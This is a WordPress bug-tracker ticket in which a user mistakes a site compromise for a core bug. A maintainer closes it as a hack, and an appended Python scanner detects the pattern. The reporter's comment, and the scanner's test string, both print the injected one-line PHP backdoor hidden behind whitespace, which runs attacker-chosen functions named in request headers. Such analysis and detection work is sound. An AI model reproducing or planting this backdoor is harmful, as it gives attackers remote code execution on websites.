#53329 closed defect (bug) (invalid)
Empty Authorization header brings down site in wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
| Reported by: | | Owned by: | |
|---|---|---|---|
| Milestone: | | Priority: | normal |
| Severity: | normal | Version: | 5.7.2 |
| Component: | REST API | Keywords: | |
| Focuses: | | Cc: | |
Description (last modified by )
I really don't know why this happened - just reporting in case this is a WordPress software issue.
A look I work with went down. Debugging showed this was because requests were made with an empty Authorization header (empty string).
If the Authorization header is -set-, which it was, wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php tries to call a function with the name of its value.
This leads to an error, unknown function () when it is an empty string.
I don't know why all the requests to this site had an empty authorization header - whether this is a server issue or not.
I had to work around this issue with a code change: ignore an Authorization header with no value.
if(isset($_HEADERS['Authorization']))
to
if(isset($_HEADERS['Authorization']) && $_HEADERS['Authorization'] !== "")
Any ideas? WordPress issue? server issue? Good idea to implement this anyway as a safeguard?
Apologies if I have missed anything, short of time.
Occurs without plugins, and with multiple themes.
Change History (5)
#3
@
2 years ago
Hi @TimothyBlynJacobs
Yep:
Fatal error: Uncaught Error: Call to undefined function () in /var/www/<site-folder>/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php:1 Stack trace:
#0 /var/www/<site-folder>/wp-settings.php(249): require()
#1 /var/www/<site-folder>/wp-config.php(95): require_once('/var/www/<site-folder>...')
#2 /var/www/<site-folder>/wp-load.php(37): require_once('/var/www/<site-folder>...')
#3 /var/www/<site-folder>/wp-blog-header.php(13): require_once('/var/www/<site-folder>...')
#4 /var/www/<site-folder>/index.php(17): require('/var/www/<site-folder>...')
#5 {main} thrown in /var/www/<site-folder>/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php on line 1
Notice: is_embed was called incorrectly. Conditional query tags do not work before the query is run. Before then, they always return false. Please see Debugging in WordPress for more information. (This message was added in version 3.1.0.) in /var/www/<site-folder>/wp-includes/functions.php on line 5313
Notice: is_search was called incorrectly. Conditional query tags do not work before the query is run. Before then, they always return false. Please see Debugging in WordPress for more information. (This message was added in version 3.1.0.) in /var/www/<site-folder>/wp-includes/functions.php on line 5313
My line 1 looked like:
(Lots of whitespace, scroll right)
<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Authorization'])){$post=$_HEADERS['Authorization']('', $_HEADERS['Sec-Websocket-Accept']($_HEADERS['Server-Timing']));$post();}
Thanks for looking at this.
#4
@
2 years ago
- Milestone Awaiting Review deleted
- Resolution set to invalid
- Status changed from new to closed
Thanks for the details @rosandiford. That line of code does not exist in WordPress Core: https://github.com/WordPress/wordpress-develop/blob/master/src/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php
Based on that code, it looks to me like your site has been hacked. I would recommend reading thru https://wordpress.org/support/article/faq-my-site-was-hacked/
Since this isn't an issue with the Core WordPress software, I'm going to close out this ticket.
Hi @rosandiford,
Thanks for reporting this issue. Do you happen to have the full stack trace of the error you encountered?
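The injected line quoted in comment 3 uses request-header values as function names and sits behind a long run of whitespace. The following is an added example, not code from the ticket or from WordPress: a heuristic scanner for those two traits in PHP source text, where `scan_php`, the pattern names and the 200-blank threshold are assumptions made for illustration.

```python
import re

# A variable assigned the request headers, e.g. $h = getallheaders();
HEADER_ASSIGN = re.compile(
    r"(\$\w+)\s*=\s*(?:getallheaders|apache_request_headers)\s*\(\s*\)", re.I)
# Request superglobal element followed by "(": $_SERVER['HTTP_X'](...)
SUPERGLOBAL_CALL = re.compile(
    r"\$_(?:SERVER|GET|POST|COOKIE|REQUEST)\s*\[[^\]]+\]\s*\(")
# Code pushed off-screen behind a long run of blanks (threshold is an assumption).
PADDING = re.compile(r"[ \t]{200,}\S")


def scan_php(source):
    """Return sorted (line_no, kind, snippet) findings for one PHP file's text."""
    calls = [SUPERGLOBAL_CALL]
    for var in {m.group(1) for m in HEADER_ASSIGN.finditer(source)}:
        # Element of a header array used as a function name: $var['X'](
        calls.append(re.compile(re.escape(var) + r"\s*\[[^\]]+\]\s*\("))
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if PADDING.search(line):
            findings.append((no, "padding", ""))
        for pat in calls:
            for m in pat.finditer(line):
                findings.append((no, "request-data-callable", m.group(0)))
    return sorted(findings)


# Line 1 as posted in the ticket, with constructed padding after "<?php".
INJECTED = ("<?php" + " " * 300 + "$_HEADERS=getallheaders();"
            "if(isset($_HEADERS['Authorization'])){"
            "$post=$_HEADERS['Authorization']('', "
            "$_HEADERS['Sec-Websocket-Accept']($_HEADERS['Server-Timing']));"
            "$post();}\n")
# Constructed benign file: reads the header but never calls it.
BENIGN = ("<?php\n$headers = getallheaders();\n"
          "if (isset($headers['Authorization'])) {\n"
          "    $token = trim($headers['Authorization']);\n}\n")

if __name__ == "__main__":
    for name, text in (("injected", INJECTED), ("benign", BENIGN)):
        print(name, scan_php(text))
```

A hit in a core file is a reason to compare that file against a clean copy of the same WordPress release, for example with WP-CLI's `wp core verify-checksums`.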